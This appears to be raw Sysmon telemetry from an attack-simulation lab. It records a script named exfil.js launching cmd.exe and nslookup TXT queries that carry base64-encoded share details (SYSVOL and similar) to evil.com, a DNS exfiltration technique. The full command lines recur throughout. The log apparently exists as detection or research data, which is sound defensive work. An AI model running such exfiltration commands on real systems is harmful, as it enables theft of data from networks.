14:21:30.159{2E1864BB-18E0-629A-6742-000000005F02}39768036C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-6C43-000000005F02}1432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.161{2E1864BB-18EA-629A-6C43-000000005F02}1432C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlertf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.143{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloeumo.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.127{2E1864BB-18EA-629A-6A43-000000005F02}64927660C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6B43-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6B43-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.112{2E1864BB-18EA-629A-6943-000000005F02}34484624C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-6B43-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.122{2E1864BB-18EA-629A-6B43-000000005F02}7536C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-6943-000000005F02}3448C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloeumo.tmp 2>&1 10341000x8000000000000000208382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.097{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-6A43-000000005F02}6492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.097{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-6A43-000000005F02}6492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.080{2E1864BB-18EA-629A-6A43-000000005F02}64927660C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6943-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.078{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6A43-000000005F02}6492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6943-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.058{2E1864BB-18E0-629A-6742-000000005F02}39761736C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-6943-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.061{2E1864BB-18EA-629A-6943-000000005F02}3448C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloeumo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.043{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloifcqlk.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-18E9-629A-6743-000000005F02}78681008C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6843-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6843-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.996{2E1864BB-18E9-629A-6643-000000005F02}35967756C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-6843-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.006{2E1864BB-18EA-629A-6843-000000005F02}4012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-6643-000000005F02}3596C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloifcqlk.tmp 2>&1 354300x800000000000000044799Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:27.556{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 